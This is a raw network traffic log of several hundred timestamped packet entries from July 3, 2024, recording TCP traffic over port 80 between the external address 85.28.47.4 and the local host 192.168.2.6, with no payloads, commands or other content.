                                                                Jul 3, 2024 08:38:11.939495087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939518929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939529896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939616919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.939649105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939661026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939677000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939687967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.939811945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.939811945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.939811945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942454100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942465067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942511082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942543983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942578077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942581892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942589998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942619085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942748070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942758083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942768097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942789078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942810059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942928076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942939043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942949057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942958117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942965031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.942975044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.942990065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943011999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943176031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943212032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943233967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943244934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943260908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943270922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943284988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943301916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943454027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943465948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943490028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943504095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943505049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943516016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943526030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.943536997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.943555117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947360039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947371960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947411060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947419882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947418928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947429895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947451115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947479963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947551966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947561979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947592020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947649956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947659969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947690964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947796106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947805882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947814941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947824001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947829008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947834015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.947860003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.947884083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948048115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948056936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948066950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948076010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948084116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948095083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948102951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948105097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948113918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948122978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948131084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948132992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948141098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948149920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948152065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948169947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948189974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948597908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948610067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.948633909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.948659897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951538086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951546907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951556921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951626062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951627970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951637983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951638937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951673031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951683044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951762915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951772928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951782942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951792002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951796055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951801062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.951816082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951843977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.951967955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952006102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952028990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952039957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952068090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952169895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952179909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952191114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952200890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952203989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952213049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952238083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952265024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952389002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952399015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952409983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952424049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952425003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952447891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952471972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952533007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952542067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952568054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952583075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952724934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952733994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952744961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952754021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952764034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952768087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952768087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952775002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952778101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952789068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952795029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952800035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952809095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952819109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.952825069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952842951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.952860117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953289986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953300953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953310013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953320026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953330040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953330040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953341007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953351021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953353882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953361988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953372002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953382015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953382015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953393936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953399897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953403950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953413963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953428984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953454018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953850031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953860998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953872919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953882933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953887939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953893900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953905106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953907013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953916073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953927040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.953954935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.953973055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.954191923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.954204082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.954238892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026462078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026485920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026496887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026586056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026597023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026645899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026645899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026645899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026683092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026685953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026696920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.026727915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.026741982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029495955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029512882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029522896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029552937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029578924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029593945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029603958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029616117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029634953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029652119 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029815912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029828072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029833078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029844046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029854059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.029876947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.029896021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030144930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030154943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030164957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030175924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030186892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030194998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030244112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030457973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030467987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030478001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030503988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030519009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030601025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030611992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.030642986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.030659914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034512997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034526110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034534931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034574986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034578085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034589052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034599066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034603119 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034610033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034643888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034667015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034802914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034812927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034822941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034833908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034851074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034877062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.034914017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.034957886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035037994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035048008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035058975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035069942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035079956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035087109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035089970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035116911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035130024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035284042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035299063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035335064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035377026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035510063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035521030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035530090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035540104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035552979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035577059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035620928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035631895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035665035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035667896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035677910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.035702944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.035728931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.038700104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038711071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038721085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038758039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.038783073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.038822889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038832903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038842916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038853884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038866043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.038892984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.038985014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.038995981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039032936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039170980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039181948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039191008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039203882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039213896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039220095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039225101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039235115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039238930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039258957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039277077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039412022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039455891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039467096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039477110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039486885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039505005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039534092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039653063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039661884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039757013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039769888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039779902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039789915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039799929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039810896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039810896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039822102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.039829016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.039855003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040009022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040019989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040029049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040054083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040071011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040148020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040158033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040169001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040180922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040224075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040224075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040401936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040412903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040426970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040437937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040443897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040448904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040458918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040468931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:12.040472031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:12.040501118 CEST4971080192.168.2.685.28.47.4
